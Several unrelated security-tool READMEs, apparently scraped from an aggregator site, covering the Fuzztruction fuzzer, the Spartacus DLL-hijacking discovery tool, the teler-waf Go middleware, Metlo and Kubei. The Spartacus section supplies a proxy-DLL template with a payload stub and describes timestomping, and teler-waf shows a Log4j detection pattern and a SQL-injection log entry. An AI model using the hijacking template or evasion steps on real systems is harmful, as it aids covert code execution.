The Fuzztruction runtime environment can be built by executing env/build.sh. This builds a Docker image containing a complete runtime environment for Fuzztruction locally. By default, a pre-built version of our patched LLVM version is used and pulled from Docker Hub. If you want to use a locally built LLVM version, check the llvm directory.

Pre-built

In most cases, there is no particular reason for using the pre-built environment -- except if you want to reproduce the exact experiments conducted in the paper. The pre-built image provides everything, including the pre-built evaluation targets and all dependencies. The image can be retrieved by executing env/pull-prebuilt.sh.

The following section documents how to spawn a runtime environment based on either a locally built image or the prebuilt one. Details regarding the reproduction of the paper's experiments can be found in the fuzztruction-experiments submodule.

Managing the Runtime Environment Lifecycle

After building or pulling a pre-built version of the runtime environment, the fuzzer is ready to use. The fuzzers environment lifecycle is managed by a set of scripts located in the env folder.

Script Description
./env/start.sh Spawn a new container or spawn a shell into an already running container. Prebuilt: Exporting USE_PREBUILT=1 spawns a container based on a pre-built environment. For switching from pre-build to local build or the other way around, stop.sh must be executed first.
./env/stop.sh This stops the container. Remember to call this after rebuilding the image.

Using start.sh, an arbitrary number of shells can be spawned in the container. Using Visual Studio Codes' Containers extension allows you to work conveniently inside the Docker container.

Several files/folders are mounted from the host into the container to facilitate data exchange. Details regarding the runtime environment are provided in the next section.

Runtime Environment Details

This section details the runtime environment (Docker container) provided alongside Fuzztruction. The user in the container is named user and has passwordless sudo access per default.

Permissions: The Docker images' user is named user and has the same User ID (UID) as the user who initially built the image. Thus, mounts from the host can be accessed inside the container. However, in the case of using the pre-built image, this might not be the case since the image was built on another machine. This must be considered when exchanging data with the host.

Inside the container, the following paths are (bind) mounted from the host:

Container Path Host Path Note
/home/user/fuzztruction ./ Pre-built: This folder is part of the image in case the pre-built image is used. Thus, changes are not reflected to the host.
/home/user/shared ./ Used to exchange data with the host.
/home/user/.zshrc ./data/zshrc -
/home/user/.zsh_history ./data/zsh_history -
/home/user/.bash_history ./data/bash_history -
/home/user/.config/nvim/init.vim ./data/init.vim -
/home/user/.config/Code ./data/vscode-data Used to persist Visual Studio Code config between container restarts.
/ssh-agent $SSH_AUTH_SOCK Allows using the SSH-Agent inside the container if it runs on the host.
/home/user/.gitconfig /home/$USER/.gitconfig Use gitconfig from the host, if there is any config.
/ccache ./data/ccache Used to persist ccache cache between container restarts.

Usage

After building the Docker runtime environment and spawning a container, the Fuzztruction binary itself must be built. After spawning a shell inside the container using ./env/start.sh, the build process is triggered automatically. Thus, the steps in the next section are primarily for those who want to rebuild Fuzztruction after applying modifications to the code.

Building Fuzztruction

For building Fuzztruction, it is sufficient to call cargo build in /home/user/fuzztruction. This will build all components described in the Components section. The most interesting build artifacts are the following:

Artifacts Description
./generator/pass/fuzztruction-source-llvm-pass.so The LLVM pass is used to insert the patch points into the generator application. Note: The location of the pass is recorded in /etc/ld.so.conf.d/fuzztruction.conf; thus, compilers are able to find the pass during compilation. If you run into trouble because the pass is not found, please run sudo ldconfig and retry using a freshly spawned shell.
./generator/pass/fuzztruction-source-clang-fast A compiler wrapper for compiling the generator application. This wrapper uses our custom compiler pass, links the targets against the agent, and injects a call to the agents' init method into the generator's main.
./target/debug/libgenerator_agent.so The agent the is injected into the generator application.
./target/debug/fuzztruction The fuzztruction binary representing the actual fuzzer.

Fuzzing a Target using Fuzztruction

We will use libpng as an example to showcase Fuzztruction's capabilities. Since libpng is relatively small and has no external dependencies, it is not required to use the pre-built image for the following steps. However, especially on mobile CPUs, the building process may take up to several hours for building the AFL++ binary because of the collision free coverage map encoding feature and compare splitting.

Building the Target

Pre-built: If the pre-built version is used, building is unnecessary and this step can be skipped.
Switch into the fuzztruction-experiments/comparison-with-state-of-the-art/binaries/ directory and execute ./build.sh libpng. This will pull the source and start the build according to the steps defined in libpng/config.sh.

Benchmarking the Target

Using the following command

sudo ./target/debug/fuzztruction fuzztruction-experiments/comparison-with-state-of-the-art/configurations/pngtopng_pngtopng/pngtopng-pngtopng.yml  --purge --show-output benchmark -i 100

allows testing whether the target works. Each target is defined using a YAML configuration file. The files are located in the configurations directory and are a good starting point for building your own config. The pngtopng-pngtopng.yml file is extensively documented.

Troubleshooting

If the fuzzer terminates with an error, there are multiple ways to assist your debugging efforts.

  • Passing --show-output to fuzztruction allows you to observe stdout/stderr of the generator and the consumer if they are not used for passing or reading data from each other.
  • Setting AFL_DEBUG in the env section of the sink in the YAML config can give you a more detailed output regarding the consumer.
  • Executing the generator and consumer using the same flags as in the config file might reveal any typo in the command line used to execute the application. In the case of using LD_PRELOAD, double check the provided paths.

Running the Fuzzer

To start the fuzzing process, executing the following command is sufficient:

sudo ./target/debug/fuzztruction ./fuzztruction-experiments/comparison-with-state-of-the-art/configurations/pngtopng_pngtopng/pngtopng-pngtopng.yml fuzz -j 10 -t 10m

This will start a fuzzing run on 10 cores, with a timeout of 10 minutes. Output produced by the fuzzer is stored in the directory defined by the work-directory attribute in the target's config file. In case of pngtopng, the default location is /tmp/pngtopng-pngtopng.

If the working directory already exists, --purge must be passed as an argument to fuzztruction to allow it to rerun. The flag must be passed before the subcommand, i.e., before fuzz or benchmark.

Combining Fuzztruction and AFL++

For running AFL++ alongside Fuzztruction, the aflpp subcommand can be used to spawn AFL++ workers that are reseeded during runtime with inputs found by Fuzztruction. Assuming that Fuzztruction was executed using the command above, it is sufficient to execute

sudo ./target/debug/fuzztruction ./fuzztruction-experiments/comparison-with-state-of-the-art/configurations/pngtopng_pngtopng/pngtopng-pngtopng.yml aflpp -j 10 -t 10m

for spawning 10 AFL++ processes that are terminated after 10 minutes. Inputs found by Fuzztruction and AFL++ are periodically synced into the interesting folder in the working directory. In case AFL++ should be executed independently but based on the same .yml configuration file, the --suffix argument can be used to append a suffix to the working directory of the spawned fuzzer.

Computing Coverage

After the fuzzing run is terminated, the tracer subcommand allows to retrieve a list of covered basic blocks for all interesting inputs found during fuzzing. These traces are stored in the traces subdirectory located in the working directory. Each trace contains a zlib compressed JSON object of the addresses of all basic blocks (in execution order) exercised during execution. Furthermore, metadata to map the addresses to the actual ELF file they are located in is provided.

The coverage tool located at ./target/debug/coverage can be used to process the collected data further. You need to pass it the top-level directory containing working directories created by Fuzztruction (e.g., /tmp in case of the previous example). Executing ./target/debug/coverage /tmp will generate a .csv file that maps time to the number of covered basic blocks and a .json file that maps timestamps to sets of found basic block addresses. Both files are located in the working directory of the specific fuzzing run.



Spartacus - DLL Hijacking Discovery Tool

By: Zion3R


Why "Spartacus"?

If you have seen the film Spartacus from 1960, you will remember the scene where the Romans are asking for Spartacus to give himself up. The moment the real Spartacus stood up, a lot of others stood up as well and claimed to be him using the "I AM SPARTACUS" phrase.

When a process that is vulnerable to DLL Hijacking is asking for a DLL to be loaded, it's kind of asking "WHO IS VERSION.DLL?" and random directories start claiming "I AM VERSION.DLL" and "NO, I AM VERSION.DLL". And thus, Spartacus.

Did you really make yet another DLL Hijacking discovery tool?

...but with a twist as Spartacus is utilising the SysInternals Process Monitor and is parsing raw PML log files. You can leave ProcMon running for hours and discover 2nd and 3rd level (ie an app that loads another DLL that loads yet another DLL when you use a specific feature of the parent app) DLL Hijacking vulnerabilities. It will also automatically generate proxy DLLs with all relevant exports for vulnerable DLLs.


Features

  • Parsing ProcMon PML files natively. The config (PMC) and log (PML) parsers have been implemented by porting partial functionality to C# from https://github.com/eronnen/procmon-parser/. You can find the format specification here.
  • Spartacus will create proxy DLLs for all missing DLLs that were identified. For instance, if an application is vulnerable to DLL Hijacking via version.dll, Spartacus will create a version.dll.cpp file for you with all the exports included in it. Then you can insert your payload/execution technique and compile.
  • Able to process large PML files and store all DLLs of interest in an output CSV file. Local benchmark processed a 3GB file with 8 million events in 45 seconds.
  • [Defence] Monitoring mode trying to identify running applications proxying calls, as in "DLL Hijacking in progress". This is just to get any low hanging fruit and should not be relied upon.
  • Able to create proxies for export functions in order to avoid using DllMain. This technique was inspired and implemented from the walkthrough described at https://www.redteam.cafe/red-team/dll-sideloading/dll-sideloading-not-by-dllmain, by Shantanu Khandelwal. For this to work Ghidra is required.

Screenshots

Spartacus Execution

CSV Output

Output Exports

Export DLL Functions

Usage

Execution Flow

  1. Generate a ProcMon (PMC) config file on the fly, based on the arguments passed. The filters that will be set are:
    • Operation is CreateFile.
    • Path ends with .dll.
    • Process name is not procmon.exe or procmon64.exe.
    • Enable Drop Filtered Events to ensure minimum PML output size.
    • Disable Auto Scroll.
  2. Execute Process Monitor.
  3. Halt its execution until the user presses ENTER.
  4. Terminates Process Monitor.
  5. Parses the output Event Log (PML) file.
    1. Creates a CSV file with all the NAME_NOT_FOUND and PATH_NOT_FOUND DLLs.
    2. Compares the DLLs from above and tries to identify the DLLs that were actually loaded.
    3. For every "found" DLL it generates a proxy DLL with all its export functions.

Command Line Arguments

Argument Description
--pml Location (file) to store the ProcMon event log file. If the file exists, it will be overwritten. When used with --existing-log it will indicate the event log file to read from and will not be overwritten.
--pmc Define a custom ProcMon (PMC) file to use. This file will not be modified and will be used as is.
--csv Location (file) to store the CSV output of the execution. This file will include only the DLLs that were marked as NAME_NOT_FOUND, PATH_NOT_FOUND, and were in user-writable locations (it excludes anything in the Windows and Program Files directories)
--exe Define process names (comma separated) that you want to track, helpful when you are interested only in a specific process.
--exports Location (folder) in which all the proxy DLL files will be saved. Proxy DLL files will only be generated if this argument is used.
--procmon Location (file) of the SysInternals Process Monitor procmon.exe or procmon64.exe
--proxy-dll-template Define a DLL template to use for generating the proxy DLL files. Only relevant when --exports is used. All #pragma exports are inserted by replacing the %_PRAGMA_COMMENTS_% string, so make sure your template includes that string in the relevant location.
--existing-log Switch to indicate that Spartacus should process an existing ProcMon event log file (PML). To indicate the event log file use --pml, useful when you have been running ProcMon for hours or used it in Boot Logging.
--all By default any DLLs in the Windows or Program Files directories will be skipped. Use this to include those directories in the output.
--detect Try to identify DLLs that are proxying calls (like 'DLL Hijacking in progress'). This isn't a feature to be relied upon, it's there to get the low hanging fruit.
--verbose Enable verbose output.
--debug Enable debug output.
--generate-proxy Switch to indicate that Spartacus will be creating proxy functions for all identified export functions.
--ghidra Used only with --generate-proxy. Absolute path to Ghidra's 'analyzeHeadless.bat' file.
--dll Used only with --generate-proxy. Absolute path to the DLL you want to proxy.
--output-dir Used only with --generate-proxy. Absolute path to the directory where the solution of the proxy will be stored. This directory should not exist, and will be auto-created.
--only-proxy Used only with --generate-proxy. Comma separated string to indicate functions to clone. Such as 'WTSFreeMemory,WTSFreeMemoryExA,WTSSetUserConfigA'

Examples

Collect all events and save them into C:\Data\logs.pml. All vulnerable DLLs will be saved as C:\Data\VulnerableDLLFiles.csv and all proxy DLLs in C:\Data\DLLExports.

--procmon C:\SysInternals\Procmon.exe --pml C:\Data\logs.pml --csv C:\Data\VulnerableDLLFiles.csv --exports C:\Data\DLLExports --verbose

Collect events only for Teams.exe and OneDrive.exe.

--procmon C:\SysInternals\Procmon.exe --pml C:\Data\logs.pml --csv C:\Data\VulnerableDLLFiles.csv --exports C:\Data\DLLExports --verbose --exe "Teams.exe,OneDrive.exe"

Collect events only for Teams.exe and OneDrive.exe, and use a custom proxy DLL template at C:\Data\myProxySkeleton.cpp.

--procmon C:\SysInternals\Procmon.exe --pml C:\Data\logs.pml --csv C:\Data\VulnerableDLLFiles.csv --exports C:\Data\DLLExports --verbose --exe "Teams.exe,OneDrive.exe" --proxy-dll-template C:\Data\myProxySkeleton.cpp

Collect events only for Teams.exe and OneDrive.exe, but don't generate proxy DLLs.

--procmon C:\SysInternals\Procmon.exe --pml C:\Data\logs.pml --csv C:\Data\VulnerableDLLFiles.csv --verbose --exe "Teams.exe,OneDrive.exe"

Parse an existing PML event log output, save output to CSV, and generate proxy DLLs.

--existing-log --pml C:\MyData\SomeBackup.pml --csv C:\Data\VulnerableDLLFiles.csv --exports C:\Data\DLLExports

Run in monitoring mode and try to detect any applications that is proxying DLL calls.

--detect

Create proxies for all identified export functions.

--generate-proxy --ghidra C:\ghidra\support\analyzeHeadless.bat --dll C:\Windows\System32\userenv.dll --output-dir C:\Projects\spartacus-wtsapi32 --verbose

Create a proxy only for a specific export function.

--generate-proxy --ghidra C:\ghidra\support\analyzeHeadless.bat --dll C:\Windows\System32\userenv.dll --output-dir C:\Projects\spartacus-wtsapi32 --verbose --only-proxy "ExpandEnvironmentStringsForUserW"

Note: When generating proxies for export functions, the solution that is created also replicates VERSIONINFO and timestomps the target DLL to match the date of the source one (using PowerShell).

Proxy DLL Template

Below is the template that is used when generating proxy DLLs, the generated #pragma statements are inserted by replacing the %_PRAGMA_COMMENTS_% string.

The only thing to be aware of is that the pragma DLL will be using a hardcoded path of its location rather than trying to load it dynamically.

#pragma once

%_PRAGMA_COMMENTS_%

#include <windows.h>
#include <string>
#include <atlstr.h>

VOID Payload() {
// Run your payload here.
}

BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpReserved)
{
switch (fdwReason)
{
case DLL_PROCESS_ATTACH:
Payload();
break;
case DLL_THREAD_ATTACH:
break;
case DLL_THREAD_DETACH:
break;
case DLL_PROCESS_DETACH:
break;
}
return TRUE;
}

If you wish to use your own template, just make sure the %_PRAGMA_COMMENTS_% is in the right place.

Contributions

Whether it's a typo, a bug, or a new feature, Spartacus is very open to contributions as long as we agree on the following:

  • You are OK with the MIT license of this project.
  • Before creating a pull request, create an issue so it could be discussed before doing any work as internal development is not tracked via the public GitHub repository. Otherwise you risk having a pull request rejected if for example we are already working on the same/similar feature, or for any other reason.

Credits



Teler-Waf - A Go HTTP Middleware That Provides Teler IDS Functionality To Protect Against Web-Based Attacks And Improve The Security Of Go-based Web Applications

By: Zion3R

teler-waf is a comprehensive security solution for Go-based web applications. It acts as an HTTP middleware, providing an easy-to-use interface for integrating IDS functionality with teler IDS into existing Go applications. By using teler-waf, you can help protect against a variety of web-based attacks, such as cross-site scripting (XSS) and SQL injection.

The package comes with a standard net/http.Handler, making it easy to integrate into your application's routing. When a client makes a request to a route protected by teler-waf, the request is first checked against the teler IDS to detect known malicious patterns. If no malicious patterns are detected, the request is then passed through for further processing.

In addition to providing protection against web-based attacks, teler-waf can also help improve the overall security and integrity of your application. It is highly configurable, allowing you to tailor it to fit the specific needs of your application.


See also:

  • kitabisa/teler: Real-time HTTP intrusion detection.
  • dwisiswant0/cox: Cox is bluemonday-wrapper to perform a deep-clean and/or sanitization of (nested-)interfaces from HTML to prevent XSS payloads.

Features

Some core features of teler-waf include:

  • HTTP middleware for Go web applications.
  • Integration of teler IDS functionality.
  • Detection of known malicious patterns using the teler IDS.
    • Common web attacks, such as cross-site scripting (XSS) and SQL injection, etc.
    • CVEs, covers known vulnerabilities and exploits.
    • Bad IP addresses, such as those associated with known malicious actors or botnets.
    • Bad HTTP referers, such as those that are not expected based on the application's URL structure or are known to be associated with malicious actors.
    • Bad crawlers, covers requests from known bad crawlers or scrapers, such as those that are known to cause performance issues or attempt to extract sensitive information from the application.
    • Directory bruteforce attacks, such as by trying common directory names or using dictionary attacks.
  • Configuration options to whitelist specific types of requests based on their URL or headers.
  • Easy integration with many frameworks.
  • High configurability to fit the specific needs of your application.

Overall, teler-waf provides a comprehensive security solution for Go-based web applications, helping to protect against web-based attacks and improve the overall security and integrity of your application.

Install

To install teler-waf in your Go application, run the following command to download and install the teler-waf package:

go get github.com/kitabisa/teler-waf

Usage

Here is an example of how to use teler-waf in a Go application:

  1. Import the teler-waf package in your Go code:
import "github.com/kitabisa/teler-waf"
  1. Use the New function to create a new instance of the Teler type. This function takes a variety of optional parameters that can be used to configure teler-waf to suit the specific needs of your application.
waf := teler.New()
  1. Use the Handler method of the Teler instance to create a net/http.Handler. This handler can then be used in your application's HTTP routing to apply teler-waf's security measures to specific routes.
handler := waf.Handler(http.HandlerFunc(yourHandlerFunc))
  1. Use the handler in your application's HTTP routing to apply teler-waf's security measures to specific routes.
http.Handle("/path", handler)

That's it! You have configured teler-waf in your Go application.

Options:

For a list of the options available to customize teler-waf, see the teler.Options struct.

Examples

Here is an example of how to customize the options and rules for teler-waf:

// main.go
package main

import (
"net/http"

"github.com/kitabisa/teler-waf"
"github.com/kitabisa/teler-waf/request"
"github.com/kitabisa/teler-waf/threat"
)

var myHandler = http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
// This is the handler function for the route that we want to protect
// with teler-waf's security measures.
w.Write([]byte("hello world"))
})

var rejectHandler = http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
// This is the handler function for the route that we want to be rejected
// if the teler-waf's security measures are triggered.
http.Error(w, "Sorry, your request has been denied for security reasons.", http.StatusForbidden)
})

func main() {
// Create a new instance of the Teler type using the New function
// and configure it using the Options struct.
telerMiddleware := teler.New(tel er.Options{
// Exclude specific threats from being checked by the teler-waf.
Excludes: []threat.Threat{
threat.BadReferrer,
threat.BadCrawler,
},
// Specify whitelisted URIs (path & query parameters), headers,
// or IP addresses that will always be allowed by the teler-waf.
Whitelists: []string{
`(curl|Go-http-client|okhttp)/*`,
`^/wp-login\.php`,
`(?i)Referer: https?:\/\/www\.facebook\.com`,
`192\.168\.0\.1`,
},
// Specify custom rules for the teler-waf to follow.
Customs: []teler.Rule{
{
// Give the rule a name for easy identification.
Name: "Log4j Attack",
// Specify the logical operator to use when evaluating the rule's conditions.
Condition: "or",
// Specify the conditions that must be met for the rule to trigger.
Rules: []teler.Condition{
{
// Specify the HTTP method that the rule applies to.
Method: request.GET,
// Specify the element of the request that the rule applies to
// (e.g. URI, headers, body).
Element: request.URI,
// Specify the pattern to match against the element of the request.
Pattern: `\$\{.*:\/\/.*\/?\w+?\}`,
},
},
},
},
// Specify the file path to use for logging.
LogFile: "/tmp/teler.log",
})

// Set the rejectHandler as the handler for the telerMiddleware.
telerMiddleware.SetHandler(rejectHandler)

// Create a new handler using the handler method of the Teler instance
// and pass in the myHandler function for the route we want to protect.
app := telerMiddleware.Handler(myHandler)

// Use the app handler as the handler for the route.
http.ListenAndServe("127.0.0.1:3000", app)
}

Warning: When using a whitelist, any request that matches it - regardless of the type of threat it poses, it will be returned without further analysis.

To illustrate, suppose you set up a whitelist to permit requests containing a certain string. In the event that a request contains that string, but /also/ includes a payload such as an SQL injection or cross-site scripting ("XSS") attack, the request may not be thoroughly analyzed for common web attack threats and will be swiftly returned. See issue #25.

For more examples of how to use teler-waf or integrate it with any framework, take a look at examples/ directory.

Development

By default, teler-waf caches all incoming requests for 15 minutes & clear them every 20 minutes to improve the performance. However, if you're still customizing the settings to match the requirements of your application, you can disable caching during development by setting the development mode option to true. This will prevent incoming requests from being cached and can be helpful for debugging purposes.

// Create a new instance of the Teler type using
// the New function & enable development mode option.
telerMiddleware := teler.New(teler.Options{
Development: true,
})

Logs

Here is an example of what the log lines would look like if teler-waf detects a threat on a request:

{"level":"warn","ts":1672261174.5995026,"msg":"bad crawler","id":"654b85325e1b2911258a","category":"BadCrawler","request":{"method":"GET","path":"/","ip_addr":"127.0.0.1:37702","headers":{"Accept":["*/*"],"User-Agent":["curl/7.81.0"]},"body":""}}
{"level":"warn","ts":1672261175.9567692,"msg":"directory bruteforce","id":"b29546945276ed6b1fba","category":"DirectoryBruteforce","request":{"method":"GET","path":"/.git","ip_addr":"127.0.0.1:37716","headers":{"Accept":["*/*"],"User-Agent":["X"]},"body":""}}
{"level":"warn","ts":1672261177.1487508,"msg":"Detects common comment types","id":"75412f2cc0ec1cf79efd","category":"CommonWebAttack","request":{"method":"GET","path":"/?id=1%27% 20or%201%3D1%23","ip_addr":"127.0.0.1:37728","headers":{"Accept":["*/*"],"User-Agent":["X"]},"body":""}}

The id is a unique identifier that is generated when a request is rejected by teler-waf. It is included in the HTTP response headers of the request (X-Teler-Req-Id), and can be used to troubleshoot issues with requests that are being made to the website.

For example, if a request to a website returns an HTTP error status code, such as a 403 Forbidden, the teler request ID can be used to identify the specific request that caused the error and help troubleshoot the issue.

Teler request IDs are used by teler-waf to track requests made to its web application and can be useful for debugging and analyzing traffic patterns on a website.

Datasets

The teler-waf package utilizes a dataset of threats to identify and analyze each incoming request for potential security threats. This dataset is updated daily, which means that you will always have the latest resource. The dataset is initially stored in the user-level cache directory (on Unix systems, it returns $XDG_CACHE_HOME/teler-waf as specified by XDG Base Directory Specification if non-empty, else $HOME/.cache/teler-waf. On Darwin, it returns $HOME/Library/Caches/teler-waf. On Windows, it returns %LocalAppData%/teler-waf. On Plan 9, it returns $home/lib/cache/teler-waf) on your first launch. Subsequent launch will utilize the cached dataset, rather than downloading it again.

Note: The threat datasets are obtained from the kitabisa/teler-resources repository.

However, there may be situations where you want to disable automatic updates to the threat dataset. For example, you may have a slow or limited internet connection, or you may be using a machine with restricted file access. In these cases, you can set an option called NoUpdateCheck to true, which will prevent the teler-waf from automatically updating the dataset.

// Create a new instance of the Teler type using the New
// function & disable automatic updates to the threat dataset.
telerMiddleware := teler.New(teler.Options{
NoUpdateCheck: true,
})

Finally, there may be cases where it's necessary to load the threat dataset into memory rather than saving it to a user-level cache directory. This can be particularly useful if you're running the application or service on a distroless or runtime image, where file access may be limited or slow. In this scenario, you can set an option called InMemory to true, which will load the threat dataset into memory for faster access.

// Create a new instance of the Teler type using the
// New function & enable in-memory threat datasets store.
telerMiddleware := teler.New(teler.Options{
InMemory: true,
})

Warning: This may also consume more system resources, so it's worth considering the trade-offs before making this decision.

Resources

Security

If you discover a security issue, please bring it to their attention right away, we take security seriously!

Reporting a Vulnerability

If you have information about a security issue, or vulnerability in this teler-waf package, and/or you are able to successfully execute such as cross-site scripting (XSS) and pop-up an alert in our demo site (see resources), please do NOT file a public issue โ€” instead, kindly send your report privately via the vulnerability report form or to our official channels as per our security policy.

Limitations

Here are some limitations of using teler-waf:

  • Performance overhead: teler-waf may introduce some performance overhead, as the teler-waf will need to process each incoming request. If you have a high volume of traffic, this can potentially slow down the overall performance of your application significantly, especially if you enable the CVEs threat detection. See benchmark below:
$ go test -bench . -cpu=4
goos: linux
goarch: amd64
pkg: github.com/kitabisa/teler-waf
cpu: 11th Gen Intel(R) Core(TM) i9-11900H @ 2.50GHz
BenchmarkTelerDefaultOptions-4 42649 24923 ns/op 6206 B/op 97 allocs/op
BenchmarkTelerCommonWebAttackOnly-4 48589 23069 ns/op 5560 B/op 89 allocs/op
BenchmarkTelerCVEOnly-4 48103 23909 ns/op 5587 B/op 90 allocs/op
BenchmarkTelerBadIPAddressOnly-4 47871 22846 ns/op 5470 B/op 87 allocs/op
BenchmarkTelerBadReferrerOnly-4 47558 23917 ns/op 5649 B/op 89 allocs/op
BenchmarkTelerBadCrawlerOnly-4 42138 24010 ns/op 5694 B/op 86 allocs/op
BenchmarkTelerDirectoryBruteforceOnly-4 45274 23523 ns/op 5657 B/op 86 allocs/op
BenchmarkT elerCustomRule-4 48193 22821 ns/op 5434 B/op 86 allocs/op
BenchmarkTelerWithoutCommonWebAttack-4 44524 24822 ns/op 6054 B/op 94 allocs/op
BenchmarkTelerWithoutCVE-4 46023 25732 ns/op 6018 B/op 93 allocs/op
BenchmarkTelerWithoutBadIPAddress-4 39205 25927 ns/op 6220 B/op 96 allocs/op
BenchmarkTelerWithoutBadReferrer-4 45228 24806 ns/op 5967 B/op 94 allocs/op
BenchmarkTelerWithoutBadCrawler-4 45806 26114 ns/op 5980 B/op 97 allocs/op
BenchmarkTelerWithoutDirectoryBruteforce-4 44432 25636 ns/op 6185 B/op 97 allocs/op
PASS
ok github.com/kitabisa/teler-waf 25.759s

Note: Benchmarking results may vary and may not be consistent. Those results were obtained when there were >1.5k CVE templates and the teler-resources dataset may have increased since then, which may impact the results.

  • Configuration complexity: Configuring teler-waf to suit the specific needs of your application can be complex, and may require a certain level of expertise in web security. This can make it difficult for those who are not familiar with application firewalls and IDS systems to properly set up and use teler-waf.
  • Limited protection: teler-waf is not a perfect security solution, and it may not be able to protect against all possible types of attacks. As with any security system, it is important to regularly monitor and maintain teler-waf to ensure that it is providing the desired level of protection.

Known Issues

To view a list of known issues with teler-waf, please filter the issues by the "known-issue" label.

License

This program is developed and maintained by members of Kitabisa Security Team, and this is not an officially supported Kitabisa product. This program is free software: you can redistribute it and/or modify it under the terms of the Apache license. Kitabisa teler-waf and any contributions are copyright ยฉ by Dwi Siswanto 2022-2023.



Suricata IDPE 6.0.12

Suricata is a network intrusion detection and prevention engine developed by the Open Information Security Foundation and its supporting vendors. The engine is multi-threaded and has native IPv6 support. It's capable of loading existing Snort rules and signatures and supports the Barnyard and Barnyard2 tools.

Metlo - An Open-Source API Security Platform

By: Zion3R

Secure Your API.


Metlo is an open-source API security platform

With Metlo you can:

  • Create an Inventory of all your API Endpoints and Sensitive Data.
  • Detect common API vulnerabilities.
  • Proactively test your APIs before they go into production.
  • Detect API attacks in real time.

Metlo does this by scanning your API traffic using one of our connectors and then analyzing trace data.


There are three ways to get started with Metlo. Metlo Cloud, Metlo Self Hosted, and our Open Source product. We recommend Metlo Cloud for almost all users as it scales to 100s of millions of requests per month and all upgrades and migrations are managed for you.

You can get started with Melto Cloud right away without a credit card. Just make an account on https://app.metlo.com and follow the instructions in our docs here.

Although we highly recommend Metlo Cloud, if you're a large company or need an air-gapped system you can self host Metlo as well! Create an account on https://my.metlo.com and follow the instructions on our docs here to setup Metlo in your own Cloud environment.

If you want to deploy our Open Source product we have instructions for AWS, GCP, Azure and Docker.

You can also join our Discord community if you need help or just want to chat!

Features

  • Endpoint Discovery - Metlo scans network traffic and creates an inventory of every single endpoint in your API.
  • Sensitive Data Scannning - Each endpoint is scanned for PII data and given a risk score.
  • Vulnerability Discovery - Get Alerts for issues like unauthenticated endpoints returning sensitive data, No HSTS headers, PII data in URL params, Open API Spec Diffs and more
  • API Security Testing - Build security tests directly in Metlo. Autogenerate tests for OWASP Top 10 vulns like BOLA, Broken Authentication, SQL Injection and more.
  • CI/CD Integration - Integrate with your CI/CD to find issues in development and staging.
  • Attack Detection - Our ML Algorithms build a model for baseline API behavior. Any deviation from this baseline is surfaced to your security team as soon as possible.
  • Attack Context - Metloโ€™s UI gives you full context around any attack to help quickly fix the vulnerability.

Testing

For tests that we can't autogenerate, our built in testing framework helps you get to 100% Security Coverage on your highest risk APIs. You can build tests in a yaml format to make sure your API is working as intendend.

For example the following test checks for broken authentication:

id: test-payment-processor-metlo.com-user-billing

meta:
name: test-payment-processor.metlo.com/user/billing Test Auth
severity: CRITICAL
tags:
- BROKEN_AUTHENTICATION

test:
- request:
method: POST
url: https://test-payment-processor.metlo.com/user/billing
headers:
- name: Content-Type
value: application/json
- name: Authorization
value: ...
data: |-
{ "ccn": "...", "cc_exp": "...", "cc_code": "..." }
assert:
- key: resp.status
value: 200
- request:
method: POST
url: https://test-payment-processor.metlo.com/user/billing
headers:
- name: Content-Type
value: application/json
data: |-
{ "ccn": "...", "cc_exp": "...", "cc_code": "..." }
assert:
- key: resp.s tatus
value: [ 401, 403 ]

You can see more information on our docs.

Why Metlo?

Most businesses have adopted public facing APIs to power their websites and apps. This has dramatically increased the attack surface for your business. Thereโ€™s been a 200% increase in API security breaches in just the last year with the APIs of companies like Uber, Meta, Experian and Just Dial leaking millions of records. It's obvious that tools are needed to help security teams make APIs more secure but there's no great solution on the market.

Some solutions require you to go through sales calls to even try the product while others have you to send all your API traffic to their own cloud. Metlo is the first Open Source API security platform that you can self host, and get started for free right away!

We're Hiring!

We would love for you to come help us make Metlo better. Come join us at Metlo!

Open-source vs. paid

This repo is entirely MIT licensed. Features like user management, user roles and attack protection require an enterprise license. Contact us for more information.

Development

Checkout our development guide for more info on how to develop Metlo locally.



Kubei - A Flexible Kubernetes Runtime Scanner


Kubei is a vulnerabilities scanning tool that allows users to get an accurate and immediate risk assessment of their kubernetes clusters. Kubei scans all images that are being used in a Kubernetes cluster, including images of application pods and system pods. It doesnโ€™t scan the entire image registries and doesnโ€™t require preliminary integration with CI/CD pipelines.
It is a configurable tool which allows users to define the scope of the scan (target namespaces), the speed, and the vulnerabilities level of interest.
It provides a graphical UI which allows the viewer to identify where and what should be replaced, in order to mitigate the discovered vulnerabilities.

Prerequisites
  1. A Kubernetes cluster is ready, and kubeconfig ( ~/.kube/config) is properly configured for the target cluster.

Required permissions
  1. Read secrets in cluster scope. This is required for getting image pull secrets for scanning private image repositories.
  2. List pods in cluster scope. This is required for calculating the target pods that need to be scanned.
  3. Create jobs in cluster scope. This is required for creating the jobs that will scan the target pods in their namespaces.

Configurations
The file deploy/kubei.yaml is used to deploy and configure Kubei on your cluster.
  1. Set the scan scope. Set the IGNORE_NAMESPACES env variable to ignore specific namespaces. Set TARGET_NAMESPACE to scan a specific namespace, or leave empty to scan all namespaces.
  2. Set the scan speed. Expedite scanning by running parallel scanners. Set the MAX_PARALLELISM env variable for the maximum number of simultaneous scanners.
  3. Set severity level threshold. Vulnerabilities with severity level higher than or equal to SEVERITY_THRESHOLD threshold will be reported. Supported levels are Unknown, Negligible, Low, Medium, High, Critical, Defcon1. Default is Medium.
  4. Set the delete job policy. Set the DELETE_JOB_POLICY env variable to define whether or not to delete completed scanner jobs. Supported values are:
    • All - All jobs will be deleted.
    • Successful - Only successful jobs will be deleted (default).
    • Never - Jobs will never be deleted.

Usage
  1. Run the following command to deploy Kubei on the cluster:
    kubectl apply -f https://raw.githubusercontent.com/Portshift/kubei/master/deploy/kubei.yaml
  2. Run the following command to verify that Kubei is up and running:
    kubectl -n kubei get pod -lapp=kubei
  3. Then, port forwarding into the Kubei webapp via the following command:
    kubectl -n kubei port-forward $(kubectl -n kubei get pods -lapp=kubei -o jsonpath='{.items[0].metadata.name}') 8080
  4. In your browser, navigate to http://localhost:8080/view/ , and then click 'GO' to run a scan.
  5. To check the state of Kubei, and the progress of ongoing scans, run the following command:
    kubectl -n kubei logs $(kubectl -n kubei get pods -lapp=kubei -o jsonpath='{.items[0].metadata.name}')
  6. Refresh the page (http://localhost:8080/view/) to update the results.


Running Kubei with an external HTTP/HTTPS proxy
